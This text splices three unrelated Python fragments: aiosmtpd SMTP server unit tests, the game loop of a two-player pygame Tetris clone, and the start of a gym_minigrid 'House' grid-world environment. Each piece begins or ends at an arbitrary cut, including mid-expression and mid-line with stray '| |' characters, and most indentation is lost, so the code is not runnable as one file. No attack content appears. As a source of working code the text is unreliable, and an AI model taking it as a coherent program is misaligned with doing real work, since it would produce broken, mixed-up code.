From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
Testing
""")
text = self.stream.getvalue()
self.assertMultiLineEqual(text, """\
---------- MESSAGE FOLLOWS ----------
mail options: ['SIZE=102']
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
X-Peer: {!r}
Testing
------------ END MESSAGE ------------
""".format(peer))
class TestDebuggingOptions(unittest.TestCase):
def setUp(self):
self.stream = StringIO()
handler = Debugging(self.stream)
controller = Controller(handler)
controller.start()
self.addCleanup(controller.stop)
self.address = (controller.hostname, controller.port)
def test_debugging_without_options(self):
with SMTP(*self.address) as client:
# Prevent ESMTP options.
client.helo()
peer = client.sock.getsockname()
client.sendmail('<EMAIL>', ['<EMAIL>'], """\
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
Testing
""")
text = self.stream.getvalue()
self.assertMultiLineEqual(text, """\
---------- MESSAGE FOLLOWS ----------
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
X-Peer: {!r}
Testing
------------ END MESSAGE ------------
""".format(peer))
def test_debugging_with_options(self):
with SMTP(*self.address) as client:
peer = client.sock.getsockname()
client.sendmail('<EMAIL>', ['<EMAIL>'], """\
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
Testing
""", mail_options=['BODY=7BIT'])
text = self.stream.getvalue()
self.assertMultiLineEqual(text, """\
---------- MESSAGE FOLLOWS ----------
mail options: ['SIZE=102', 'BODY=7BIT']
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
X-Peer: {!r}
Testing
------------ END MESSAGE ------------
""".format(peer))
class TestMessage(unittest.TestCase):
def test_message(self):
# In this test, the message content comes in as a bytes.
handler = DataHandler()
controller = Controller(handler)
controller.start()
self.addCleanup(controller.stop)
with SMTP(controller.hostname, controller.port) as client:
client.sendmail('<EMAIL>', ['<EMAIL>'], """\
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
Message-ID: <ant>
Testing
""")
# The content is not converted, so it's bytes.
self.assertEqual(handler.content, handler.original_content)
self.assertIsInstance(handler.content, bytes)
self.assertIsInstance(handler.original_content, bytes)
def test_message_decoded(self):
# In this test, the message content comes in as a string.
handler = DataHandler()
controller = DecodingController(handler)
controller.start()
self.addCleanup(controller.stop)
with SMTP(controller.hostname, controller.port) as client:
client.sendmail('<EMAIL>', ['<EMAIL>'], """\
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
Message-ID: <ant>
Testing
""")
self.assertNotEqual(handler.content, handler.original_content)
self.assertIsInstance(handler.content, str)
self.assertIsInstance(handler.original_content, bytes)
class TestAsyncMessage(unittest.TestCase):
def setUp(self):
self.handled_message = None
class MessageHandler(AsyncMessage):
async def handle_message(handler_self, message):
self.handled_message = message
self.handler = MessageHandler()
def test_message(self):
# In this test, the message data comes in as bytes.
controller = Controller(self.handler)
controller.start()
self.addCleanup(controller.stop)
with SMTP(controller.hostname, controller.port) as client:
client.sendmail('<EMAIL>', ['<EMAIL>'], """\
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
Message-ID: <ant>
Testing
""")
self.assertEqual(self.handled_message['subject'], 'A test')
self.assertEqual(self.handled_message['message-id'], '<ant>')
self.assertIsNotNone(self.handled_message['X-Peer'])
self.assertEqual(
self.handled_message['X-MailFrom'], '<EMAIL>')
self.assertEqual(self.handled_message['X-RcptTo'], '<EMAIL>')
def test_message_decoded(self):
# With a server that decodes the data, the messages come in as
# strings. There's no difference in the message seen by the
# handler's handle_message() method, but internally this gives full
# coverage.
controller = DecodingController(self.handler)
controller.start()
self.addCleanup(controller.stop)
with SMTP(controller.hostname, controller.port) as client:
client.sendmail('<EMAIL>', ['<EMAIL>'], """\
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
Message-ID: <ant>
Testing
""")
self.assertEqual(self.handled_message['subject'], 'A test')
self.assertEqual(self.handled_message['message-id'], '<ant>')
self.assertIsNotNone(self.handled_message['X-Peer'])
self.assertEqual(
self.handled_message['X-MailFrom'], '<EMAIL>')
self.assertEqual(self.handled_message['X-RcptTo'], '<EMAIL>')
class TestMailbox(unittest.TestCase):
def setUp(self):
self.tempdir = TemporaryDirectory()
self.addCleanup(self.tempdir.cleanup)
self.maildir_path = os.path.join(self.tempdir.name, 'maildir')
self.handler = handler = Mailbox(self.maildir_path)
controller = Controller(handler)
controller.start()
self.addCleanup(controller.stop)
self.address = (controller.hostname, controller.port)
def test_mailbox(self):
with SMTP(*self.address) as client:
client.sendmail(
'<EMAIL>', ['<EMAIL>'], """\
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
Message-ID: <ant>
Hi Bart, this is Anne.
""")
client.sendmail(
'<EMAIL>', ['<EMAIL>'], """\
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
Message-ID: <bee>
Hi Dave, this is Cate.
""")
client.sendmail(
'<EMAIL>', ['<EMAIL>'], """\
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
Message-ID: <cat>
Hi Fred, this is Elle.
""")
# Check the messages in the mailbox.
mailbox = Maildir(self.maildir_path)
messages = sorted(mailbox, key=itemgetter('message-id'))
self.assertEqual(
list(message['message-id'] for message in messages),
['<ant>', '<bee>', '<cat>'])
def test_mailbox_reset(self):
with SMTP(*self.address) as client:
client.sendmail(
'<EMAIL>', ['<EMAIL>'], """\
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
Message-ID: <ant>
Hi Bart, this is Anne.
""")
self.handler.reset()
mailbox = Maildir(self.maildir_path)
self.assertEqual(list(mailbox), [])
class FakeParser:
def __init__(self):
self.message = None
def error(self, message):
self.message = message
raise SystemExit
class TestCLI(unittest.TestCase):
def setUp(self):
self.parser = FakeParser()
def test_debugging_cli_no_args(self):
handler = Debugging.from_cli(self.parser)
self.assertIsNone(self.parser.message)
self.assertEqual(handler.stream, sys.stdout)
def test_debugging_cli_two_args(self):
self.assertRaises(
SystemExit,
Debugging.from_cli, self.parser, 'foo', 'bar')
self.assertEqual(
self.parser.message, 'Debugging usage: [stdout|stderr]')
def test_debugging_cli_stdout(self):
handler = Debugging.from_cli(self.parser, 'stdout')
self.assertIsNone(self.parser.message)
self.assertEqual(handler.stream, sys.stdout)
def test_debugging_cli_stderr(self):
handler = Debugging.from_cli(self.parser, 'stderr')
self.assertIsNone(self.parser.message)
self.assertEqual(handler.stream, sys.stderr)
def test_debugging_cli_bad_argument(self):
self.assertRaises(
SystemExit,
Debugging.from_cli, self.parser, 'stdfoo')
self.assertEqual(
self.parser.message, 'Debugging usage: [stdout|stderr]')
def test_sink_cli_no_args(self):
handler = Sink.from_cli(self.parser)
self.assertIsNone(self.parser.message)
self.assertIsInstance(handler, Sink)
def test_sink_cli_any_args(self):
self.assertRaises(
SystemExit,
Sink.from_cli, self.parser, 'foo')
self.assertEqual(
self.parser.message, 'Sink handler does not accept arguments')
def test_mailbox_cli_no_args(self):
self.assertRaises(SystemExit, Mailbox.from_cli, self.parser)
self.assertEqual(
self.parser.message,
'The directory for the maildir is required')
def test_mailbox_cli_too_many_args(self):
self.assertRaises(SystemExit, Mailbox.from_cli, self.parser,
'foo', 'bar', 'baz')
self.assertEqual(
self.parser.message,
'Too many arguments for Mailbox handler')
def test_mailbox_cli(self):
with TemporaryDirectory() as tmpdir:
handler = Mailbox.from_cli(self.parser, tmpdir)
self.assertIsInstance(handler.mailbox, Maildir)
self.assertEqual(handler.mail_dir, tmpdir)
class TestProxy(unittest.TestCase):
def setUp(self):
# There are two controllers and two SMTPd's running here. The
# "upstream" one listens on port 9025 and is connected to a "data
# handler" which captures the messages it receives. The second -and
# the one under test here- listens on port 9024 and proxies to the one
# on port 9025. Because we need to set the decode_data flag
# differently for each different test, the controller of the proxy is
# created in the individual tests, not in the setup.
self.upstream = DataHandler()
upstream_controller = Controller(self.upstream, port=9025)
upstream_controller.start()
self.addCleanup(upstream_controller.stop)
self.proxy = Proxy(upstream_controller.hostname, 9025)
self.source = """\
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
Testing
"""
# The upstream SMTPd will always receive the content as bytes
# delimited with CRLF.
self.expected = CRLF.join([
'From: <NAME> <<EMAIL>>',
'To: <NAME> <<EMAIL>>',
'Subject: A test',
'X-Peer: ::1',
'',
'Testing\r\n']).encode('ascii')
def test_deliver_bytes(self):
with ExitStack() as resources:
controller = Controller(self.proxy, port=9024)
controller.start()
resources.callback(controller.stop)
client = resources.enter_context(
SMTP(*(controller.hostname, controller.port)))
client.sendmail(
'<EMAIL>', ['<EMAIL>'], self.source)
client.quit()
self.assertEqual(self.upstream.content, self.expected)
self.assertEqual(self.upstream.original_content, self.expected)
def test_deliver_str(self):
with ExitStack() as resources:
controller = DecodingController(self.proxy, port=9024)
controller.start()
resources.callback(controller.stop)
client = resources.enter_context(
SMTP(*(controller.hostname, controller.port)))
client.sendmail(
'<EMAIL>', ['<EMAIL>'], self.source)
client.quit()
self.assertEqual(self.upstream.content, self.expected)
self.assertEqual(self.upstream.original_content, self.expected)
class TestProxyMocked(unittest.TestCase):
def setUp(self):
handler = Proxy('localhost', 9025)
controller = DecodingController(handler)
controller.start()
self.addCleanup(controller.stop)
self.address = (controller.hostname, controller.port)
self.source = """\
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
Testing
"""
def test_recipients_refused(self):
with ExitStack() as resources:
log_mock = resources.enter_context(patch('aiosmtpd.handlers.log'))
mock = resources.enter_context(
patch('aiosmtpd.handlers.smtplib.SMTP'))
mock().sendmail.side_effect = SMTPRecipientsRefused({
'<EMAIL>': (500, 'Bad Bart'),
})
client = resources.enter_context(SMTP(*self.address))
client.sendmail(
'<EMAIL>', ['<EMAIL>'], self.source)
client.quit()
# The log contains information about what happened in the proxy.
self.assertEqual(
log_mock.info.call_args_list, [
call('got SMTPRecipientsRefused'),
call('we got some refusals: %s',
{'<EMAIL>': (500, 'Bad Bart')})]
)
def test_oserror(self):
with ExitStack() as resources:
log_mock = resources.enter_context(patch('aiosmtpd.handlers.log'))
mock = resources.enter_context(
patch('aiosmtpd.handlers.smtplib.SMTP'))
mock().sendmail.side_effect = OSError
client = resources.enter_context(SMTP(*self.address))
client.sendmail(
'<EMAIL>', ['<EMAIL>'], self.source)
client.quit()
# The log contains information about what happened in the proxy.
self.assertEqual(
log_mock.info.call_args_list, [
call('we got some refusals: %s',
{'<EMAIL>': (-1, 'ignore')}),
]
)
class HELOHandler:
async def handle_HELO(self, server, session, envelope, hostname):
return '250 geddy.example.com'
class EHLOHandler:
async def handle_EHLO(self, server, session, envelope, hostname):
return '250 alex.example.com'
class MAILHandler:
async def handle_MAIL(self, server, session, envelope, address, options):
envelope.mail_options.extend(options)
return '250 Yeah, sure'
class RCPTHandler:
async def handle_RCPT(self, server, session, envelope, address, options):
envelope.rcpt_options.extend(options)
if address == '<EMAIL>':
return '550 Rejected'
envelope.rcpt_tos.append(address)
return '250 OK'
class DATAHandler:
async def handle_DATA(self, server, session, envelope):
return '599 Not today'
class AUTHHandler:
async def handle_AUTH(self, server, session, envelope, args):
server.authenticates = True
return '235 Authentication successful'
class NoHooksHandler:
pass
class TestHooks(unittest.TestCase):
def test_rcpt_hook(self):
controller = Controller(RCPTHandler())
controller.start()
self.addCleanup(controller.stop)
with SMTP(controller.hostname, controller.port) as client:
with self.assertRaises(SMTPRecipientsRefused) as cm:
client.sendmail('<EMAIL>', ['<EMAIL>'], """\
From: <EMAIL>
To: <EMAIL>
Subject: Test
""")
self.assertEqual(cm.exception.recipients, {
'<EMAIL>': (550, b'Rejected'),
})
def test_helo_hook(self):
controller = Controller(HELOHandler())
controller.start()
self.addCleanup(controller.stop)
with SMTP(controller.hostname, controller.port) as client:
code, response = client.helo('me')
self.assertEqual(code, 250)
self.assertEqual(response, b'geddy.example.com')
def test_ehlo_hook(self):
controller = Controller(EHLOHandler())
controller.start()
self.addCleanup(controller.stop)
with SMTP(controller.hostname, controller.port) as client:
code, response = client.ehlo('me')
self.assertEqual(code, 250)
lines = response.decode('utf-8').splitlines()
            self.assertEqual(lines[-1], 'alex.example.com')
def test_mail_hook(self):
controller = Controller(MAILHandler())
controller.start()
self.addCleanup(controller.stop)
with SMTP(controller.hostname, controller.port) as client:
client.helo('me')
            code, response = client.mail('<EMAIL>')
            self.assertEqual(code, 250)
            self.assertEqual(response, b'Yeah, sure')
mino, rotation):
dy += 1
# Create new mino
else:
if hard_drop or bottom_count == 6:
hard_drop = False
bottom_count = 0
score += 10 * level
draw_mino(dx, dy, mino, rotation)
draw_mino_2P(dx_2P, dy_2P, mino_2P, rotation_2P)
draw_multiboard(next_mino,hold_mino,next_mino_2P,hold_mino_2P,score,level,goal)
if is_stackable(next_mino):
mino = next_mino
next_mino = randint(1, 7)
dx, dy = 3, 0
rotation = 0
hold = False
                    else: # game over when no more minos can be stacked
ui_variables.GameOver_sound.play()
start = False
game_over = True
pygame.time.set_timer(pygame.USEREVENT, 1)
else:
bottom_count += 1
# Move mino down
if not is_bottom_2P(dx_2P, dy_2P, mino_2P, rotation_2P):
dy_2P += 1
# Create new mino
else:
if hard_drop_2P or bottom_count_2P == 6:
hard_drop_2P = False
bottom_count_2P = 0
score += 10 * level
draw_mino_2P(dx_2P, dy_2P, mino_2P, rotation_2P)
draw_mino(dx, dy, mino, rotation)
draw_multiboard(next_mino,hold_mino,next_mino_2P,hold_mino_2P,score,level,goal)
if is_stackable_2P(next_mino_2P):
mino_2P = next_mino_2P
next_mino_2P = randint(1, 7)
dx_2P, dy_2P = 3, 0
rotation_2P = 0
hold_2P = False
                    else: # game over when no more minos can be stacked
ui_variables.GameOver_sound.play()
start = False
game_over = True
pygame.time.set_timer(pygame.USEREVENT, 1)
else:
bottom_count_2P += 1
# Erase line
                # Combo count
erase_count = 0
erase_count_2P = 0
combo_value = 0
sent = 0
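                # For each full row j, every row above it is copied one cell
                # down (k walks from j toward the top), which deletes the row
                # and drops the stack; the same scan runs on each player's matrix.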
for j in range(21):
is_full = True
for i in range(10):
if matrix[i][j] == 0:
is_full = False
if is_full:
erase_count += 1
k = j
combo_value += 1
while k > 0:
for i in range(10):
matrix[i][k] = matrix[i][k - 1]
k -= 1
for j in range(21):
is_full = True
for i in range(10):
if matrix_2P[i][j] == 0:
is_full = False
if is_full:
erase_count_2P += 1
k = j
combo_value += 1
while k > 0:
for i in range(10):
matrix_2P[i][k] = matrix_2P[i][k - 1]
k -= 1
                # If no line was erased, the combo would be decremented (currently disabled):
#if erase_count == 0 :
#combo_count -= 1
#if combo_count < 0:
#combo_count = 0
if erase_count >= 1:
combo_count += 1
if erase_count == 1:
ui_variables.break_sound.play()
ui_variables.single_sound.play()
score += 50 * level * erase_count + combo_count
sent += 1
elif erase_count == 2:
ui_variables.break_sound.play()
ui_variables.double_sound.play()
ui_variables.double_sound.play()
score += 150 * level * erase_count + 2 * combo_count
sent += 2
elif erase_count == 3:
ui_variables.break_sound.play()
ui_variables.triple_sound.play()
ui_variables.triple_sound.play()
ui_variables.triple_sound.play()
score += 350 * level * erase_count + 3 * combo_count
sent += 3
elif erase_count == 4:
ui_variables.break_sound.play()
ui_variables.tetris_sound.play()
ui_variables.tetris_sound.play()
ui_variables.tetris_sound.play()
ui_variables.tetris_sound.play()
score += 1000 * level * erase_count + 4 * combo_count
screen.blit(ui_variables.combo_4ring, (250, 160))
sent += 4
for i in range(1, 11) :
                    if combo_count == i : # combo images for 1-10
screen.blit(ui_variables.large_combos[i-1], (124, 190)) # blits the combo number
                    elif combo_count > 10 : # combo image for 11 and above
screen.blit(tetris4, (100, 190)) # blits the combo number
for i in range(1, 10) :
                    if combo_count == i+2 : # combo sounds for 3-11
ui_variables.combos_sound[i-1].play()
                sent = checkCombo(combo_count, sent) # increase the combo
# Increase level
goal -= erase_count
if goal < 1 and level < 15:
level += 1
ui_variables.LevelUp_sound.play()
ui_variables.LevelUp_sound.play()
ui_variables.LevelUp_sound.play()
ui_variables.LevelUp_sound.play()
goal += level * 5
framerate = int(framerate * 0.8)
            elif event.type == KEYUP: # important
erase_mino(dx, dy, mino, rotation)
erase_mino_2P(dx_2P, dy_2P, mino_2P, rotation_2P)
if event.key == K_ESCAPE:
ui_variables.click_sound.play()
start = False
pause = True
# Hard drop
elif event.key == K_SPACE:
ui_variables.fall_sound.play()
ui_variables.drop_sound.play()
while not is_bottom(dx, dy, mino, rotation):
dy += 1
hard_drop = True
pygame.time.set_timer(pygame.USEREVENT, 1)
draw_mino(dx, dy, mino, rotation)
draw_mino_2P(dx_2P,dy_2P,mino_2P,rotation_2P)
draw_multiboard(next_mino,hold_mino,next_mino_2P,hold_mino_2P,score,level,goal)
elif event.key == K_f:
ui_variables.fall_sound.play()
ui_variables.drop_sound.play()
while not is_bottom_2P(dx_2P, dy_2P, mino_2P, rotation_2P):
dy_2P += 1
hard_drop_2P = True
pygame.time.set_timer(pygame.USEREVENT, 1)
draw_mino_2P(dx_2P, dy_2P, mino_2P, rotation_2P)
draw_mino(dx, dy, mino, rotation)
draw_multiboard(next_mino,hold_mino,next_mino_2P,hold_mino_2P,score,level,goal)
# Hold
elif event.key == K_LSHIFT :
if hold == False:
ui_variables.move_sound.play()
if hold_mino == -1:
hold_mino = mino
mino = next_mino
next_mino = randint(1, 7)
else:
hold_mino, mino = mino, hold_mino
dx, dy = 3, 0
rotation = 0
hold = True
draw_mino(dx, dy, mino, rotation)
draw_mino_2P(dx_2P, dy_2P, mino_2P, rotation_2P)
draw_multiboard(next_mino,hold_mino,next_mino_2P,hold_mino_2P,score,level,goal)
elif event.key == K_c :
if hold_2P == False:
ui_variables.move_sound.play()
if hold_mino_2P == -1:
hold_mino_2P = mino_2P
mino_2P = next_mino_2P
next_mino_2P = randint(1, 7)
else:
hold_mino_2P, mino_2P = mino_2P, hold_mino_2P
dx_2P, dy_2P = 3, 0
rotation_2P = 0
hold_2P = True
draw_mino_2P(dx_2P, dy_2P, mino_2P, rotation_2P)
draw_mino(dx, dy, mino, rotation)
draw_multiboard(next_mino,hold_mino,next_mino_2P,hold_mino_2P,score,level,goal)
# Turn right
elif event.key == K_UP :
if is_turnable_r(dx, dy, mino, rotation):
ui_variables.move_sound.play()
rotation += 1
# Kick
elif is_turnable_r(dx, dy - 1, mino, rotation):
ui_variables.move_sound.play()
dy -= 1
rotation += 1
elif is_turnable_r(dx + 1, dy, mino, rotation):
ui_variables.move_sound.play()
dx += 1
rotation += 1
elif is_turnable_r(dx - 1, dy, mino, rotation):
ui_variables.move_sound.play()
dx -= 1
rotation += 1
elif is_turnable_r(dx, dy - 2, mino, rotation):
ui_variables.move_sound.play()
dy -= 2
rotation += 1
elif is_turnable_r(dx + 2, dy, mino, rotation):
ui_variables.move_sound.play()
dx += 2
rotation += 1
elif is_turnable_r(dx - 2, dy, mino, rotation):
ui_variables.move_sound.play()
dx -= 2
rotation += 1
if rotation == 4:
rotation = 0
draw_mino(dx, dy, mino, rotation)
draw_mino_2P(dx_2P, dy_2P, mino_2P, rotation_2P)
draw_multiboard(next_mino,hold_mino,next_mino_2P,hold_mino_2P,score,level,goal)
elif event.key == K_x:
if is_turnable_r(dx_2P, dy_2P, mino_2P, rotation_2P):
ui_variables.move_sound.play()
rotation_2P += 1
# Kick
elif is_turnable_r(dx_2P, dy_2P - 1, mino_2P, rotation_2P):
ui_variables.move_sound.play()
dy_2P -= 1
rotation_2P += 1
elif is_turnable_r(dx_2P + 1, dy_2P, mino_2P, rotation_2P):
ui_variables.move_sound.play()
dx_2P += 1
rotation_2P += 1
elif is_turnable_r(dx_2P - 1, dy_2P, mino_2P, rotation_2P):
ui_variables.move_sound.play()
dx_2P -= 1
rotation_2P += 1
elif is_turnable_r(dx_2P, dy_2P - 2, mino_2P, rotation_2P):
ui_variables.move_sound.play()
dy_2P -= 2
rotation_2P += 1
elif is_turnable_r(dx_2P + 2, dy_2P, mino_2P, rotation_2P):
ui_variables.move_sound.play()
dx_2P += 2
rotation_2P += 1
elif is_turnable_r(dx_2P - 2, dy_2P, mino_2P, rotation_2P):
ui_variables.move_sound.play()
dx_2P -= 2
rotation_2P += 1
if rotation_2P == 4:
rotation_2P = 0
draw_mino_2P(dx_2P, dy_2P, mino_2P, rotation_2P)
draw_mino(dx, dy, mino, rotation)
draw_multiboard(next_mino,hold_mino,next_mino_2P,hold_mino_2P,score,level,goal)
# Turn left
elif event.key == K_z or event.key == K_LCTRL:
if is_turnable_l(dx, dy, mino, rotation):
ui_variables.move_sound.play()
rotation -= 1
# Kick
elif is_turnable_l(dx, dy - 1, mino, rotation):
ui_variables.move_sound.play()
dy -= 1
rotation -= 1
elif is_turnable_l(dx + 1, dy, mino, rotation):
ui_variables.move_sound.play()
dx += 1
rotation -= 1
elif is_turnable_l(dx - 1, dy, mino, rotation):
ui_variables.move_sound.play()
dx -= 1
rotation -= 1
                    elif is_turnable_l(dx, dy - 2, mino, rotation):
                        ui_variables.move_sound.play()
                        dy -= 2
                        rotation -= 1
                    elif is_turnable_l(dx + 2, dy, mino, rotation):
                        ui_variables.move_sound.play()
                        dx += 2
                        rotation -= 1
                    elif is_turnable_l(dx - 2, dy, mino, rotation):
                        ui_variables.move_sound.play()
                        dx -= 2
                        rotation -= 1
if rotation == -1:
rotation = 3
draw_mino(dx, dy, mino, rotation)
draw_mino_2P(dx_2P, dy_2P, mino_2P, rotation_2P)
draw_multiboard(next_mino,hold_mino,next_mino_2P,hold_mino_2P,score,level,goal)
# Move left
elif event.key == K_LEFT: # key = pygame.key.get_pressed()
if not is_leftedge(dx, dy, mino, rotation):
ui_variables.move_sound.play()
keys_pressed = pygame.key.get_pressed()
pygame.time.set_timer(pygame.KEYUP, framerate * 3)
dx -= 1
draw_mino(dx, dy, mino, rotation)
draw_mino_2P(dx_2P, dy_2P, mino_2P, rotation_2P)
draw_multiboard(next_mino,hold_mino,next_mino_2P,hold_mino_2P,score,level,goal)
# Move right
elif event.key == K_RIGHT: # keys_pressed[K_RIGHT] :
if not is_rightedge(dx, dy, mino, rotation):
ui_variables.move_sound.play()
keys_pressed = pygame.key.get_pressed()
pygame.time.set_timer(pygame.KEYUP, framerate * 3)
dx += 1
draw_mino(dx, dy, mino, rotation)
draw_mino_2P(dx_2P, dy_2P, mino_2P, rotation_2P)
draw_multiboard(next_mino,hold_mino,next_mino_2P,hold_mino_2P,score,level,goal)
elif event.key == K_a : # key = pygame.key.get_pressed()
if not is_leftedge_2P(dx_2P, dy_2P, mino_2P, rotation_2P):
ui_variables.move_sound.play()
keys_pressed = pygame.key.get_pressed()
pygame.time.set_timer(pygame.KEYUP, framerate * 3)
dx_2P -= 1
draw_mino_2P(dx_2P, dy_2P, mino_2P, rotation_2P)
draw_mino(dx, dy, mino, rotation)
draw_multiboard(next_mino,hold_mino,next_mino_2P,hold_mino_2P,score,level,goal)
# Move right
elif event.key == K_d :
if not is_rightedge_2P(dx_2P, dy_2P, mino_2P, rotation_2P):
ui_variables.move_sound.play()
keys_pressed = pygame.key.get_pressed()
pygame.time.set_timer(pygame.KEYUP, framerate * 3)
dx_2P += 1
draw_mino_2P(dx_2P, dy_2P, mino_2P, rotation_2P)
draw_mino(dx, dy, mino, rotation)
draw_multiboard(next_mino,hold_mino,next_mino_2P,hold_mino_2P,score,level,goal)
#elif unpressed(pygame.K_LEFT) :
# movement_keys_timer = movement_keys_speed * 2
#elif unpressed(pygame.K_RIGHT) :
# movement_keys_timer = movement_keys_speed * 2
if any(movement_keys.values()):
movement_keys_timer += clock.tick(50)
#if movement_keys_timer > movement_keys_speed:
# pressed(pygame.K_LEFT)
# pressed(pygame.K_RIGHT)
# movement_keys_timer %= movement_keys_speed
pygame.display.update()
# Game over screen
elif game_over:
for event in pygame.event.get():
if event.type == QUIT:
done = True
elif event.type == USEREVENT:
pygame.mixer.music.stop()
pygame.time.set_timer(pygame.USEREVENT, 300)
over_text_1 = ui_variables.h2_b.render("GAME", 1, ui_variables.red)
over_text_2 = ui_variables.h2_b.render("OVER", 1, ui_variables.red)
over_start = ui_variables.h5.render("Press return to continue", 1, ui_variables.black)
draw_board(next_mino, hold_mino, score, level, goal)
screen.blit(over_text_1, (130, 250))
screen.blit(over_text_2, (135, 290))
name_1 = ui_variables.h2_i.render(chr(name[0]), 1, ui_variables.black)
name_2 = ui_variables.h2_i.render(chr(name[1]), 1, ui_variables.black)
name_3 = ui_variables.h2_i.render(chr(name[2]), 1, ui_variables.black)
underbar_1 = ui_variables.h2.render("_", 1, ui_variables.black)
underbar_2 = ui_variables.h2.render("_", 1, ui_variables.black)
underbar_3 = ui_variables.h2.render("_", 1, | |
"""
House Environment and related utilities.
"""
from gym_minigrid.minigrid import Grid, MiniGridEnv, Floor, Door, Wall, Goal, Ball, Key, Box, Lava
from gym_minigrid.minigrid import OBJECT_TO_IDX, IDX_TO_OBJECT, IDX_TO_COLOR
from gym_minigrid.register import register
from enum import IntEnum
import random
import numpy as np
import networkx as nx
import matplotlib.pyplot as plt
CELL_PIXELS = 32
class House(Grid):
"""
Creates whole house environment from underlying lattice graph, adding doors, objects, rewards, obstacles, etc.
"""
# TODO property and setters/getters to hide cumbersome checks
# Room sizes
MAX_ROOM_WIDTH = 8
MAX_ROOM_HEIGHT = 8
MIN_ROOM_WIDTH = 3
MIN_ROOM_HEIGHT = 3
def __init__(self, lattice, room_w=None, room_h=None, obstacles=True, doors_open=True, verbose=False):
"""
Create house from lattice graph.
@param lattice: Lattice instance.
@param room_w, room_h: Positive integers. Room width and height. Random if not provided.
@param obstacles: Boolean. If True, put an obstacle (lava) in every room.
@param doors_open: Boolean. If True, all doors are open. Defaults to True.
@param verbose: Boolean. If True, print stuff while building house. Mostly for debugging.
"""
self.lattice = lattice
self.dim = lattice.dim
        # TODO we'll consider non-square rooms in the future
        assert room_h == room_w
        if room_w is None:
            room_w = random.choice(range(self.MIN_ROOM_WIDTH, self.MAX_ROOM_WIDTH+1))
            room_h = room_w  # keep rooms square; an independent random height would break the assert above
assert House.MIN_ROOM_WIDTH <= room_w <= House.MAX_ROOM_WIDTH
self.room_w = room_w
        assert House.MIN_ROOM_HEIGHT <= room_h <= House.MAX_ROOM_HEIGHT
self.room_h = room_h
        # each room spans room_w tiles plus one shared wall; the final +1 closes the outer wall
        width = self.dim[0] * (self.room_w + 1) + 1
        height = self.dim[1] * (self.room_h + 1) + 1
# TODO fine-grained control of obstacles instead of single boolean
# We could try to handle, from less to more random:
# - dict with exact obstacle coords
# - list of rooms & # of obstacles in each
# - prob of obstacle per room
# - whether to put obstacles or not - current implementation
self.obstacles = obstacles
self.doors_open = doors_open
self.verbose = verbose
if self.verbose:
print('There are {}-by-{} rooms'.format(*self.dim))
print('Each room has {}-by-{} tiles'.format(self.room_w, self.room_h))
print('Whole house has {}-by-{} tiles'.format(width, height))
super().__init__(width=width, height=height)
self.shape = self.width, self.height
self._set_floor()
self._build_outer_walls()
self._build_inner_walls()
self._add_reward()
self._add_obstacles()
# NOTE: None tiles are reserved for the agent - see self.encode
assert all([tile is not None for tile in self.grid])
def plot(self, ax=None, agent_plot=None):
"""Diagnostic plot."""
if ax is None:
            dims = (1, 2) if self.width >= self.height else (2, 1)
            fig, ax = plt.subplots(*dims)  # orient the panels to fit the house aspect
img = self.encode()
if agent_plot is not None:
i, j, v = agent_plot
img[i, j, 0] = v
self.lattice.plot(ax=ax[0])
ax[1].imshow(img[:,:,0]) #.T, origin='lower')
ax[0].set_xticks([])
ax[0].set_yticks([])
ax[1].set_xticks([])
ax[1].set_yticks([])
return ax
@staticmethod
def decode(array):
"""
Decode an array grid encoding back into a grid
"""
width, height, channels = array.shape
assert channels == 3
grid = Grid(width, height)
for i in range(width):
for j in range(height):
typeIdx, colorIdx, state = array[i, j]
if typeIdx == OBJECT_TO_IDX['unseen'] or \
typeIdx == OBJECT_TO_IDX['empty']:
continue
objType = IDX_TO_OBJECT[typeIdx]
color = IDX_TO_COLOR[colorIdx]
# State, 0: open, 1: closed, 2: locked
is_open = state == 0
is_locked = state == 2
if objType == 'wall':
v = Wall(color)
elif objType == 'floor':
v = Floor(color)
elif objType == 'ball':
v = Ball(color)
elif objType == 'key':
v = Key(color)
elif objType == 'box':
v = Box(color)
elif objType == 'door':
v = Door(color, is_open, is_locked)
elif objType == 'goal':
v = Goal()
elif objType == 'lava':
v = Lava()
elif objType == 'agent':
v = None
else:
assert False, "unknown obj type in decode '%s'" % objType
grid.set(i, j, v)
return grid
def _set_floor(self):
"""Cover entire grid with floor tiles."""
[self.set(i, j, Floor()) for i in range(self.width) for j in range(self.height)]
def _build_outer_walls(self):
"""Build surrounding walls."""
self.horz_wall(0, 0)
self.horz_wall(0, self.height-1)
self.vert_wall(0, 0)
self.vert_wall(self.width-1, 0)
def _build_inner_walls(self):
"""Build walls between rooms, doors included."""
# Loop over rooms
for (i,j) in self.lattice.nodes:
#if i==self.dim[0] or j==self.dim[1]: # discard rightmost and top nodes
# continue
xL = i * self.room_w + i
yT = j * self.room_h + j
xR = xL + self.room_w + 1
yB = yT + self.room_h + 1
# Right vertical wall
            if self.verbose: print('Adding vertical wall of height {} at ({}, {})'.format(self.room_h+1, xR, yT))
self.vert_wall(xR, yT, self.room_h+1)
# Bottom horizontal wall
            if self.verbose: print('Adding horizontal wall of width {} at ({}, {})'.format(self.room_w+1, xL, yB))
self.horz_wall(xL, yB, self.room_w+1)
# Add doors if needed
            doors = []
            if ((i,j),(i+1,j)) in self.lattice.edges:
                coords = (xR, random.choice(range(yT+1, yB)))
                self._add_door(coords)
                doors.append(coords)
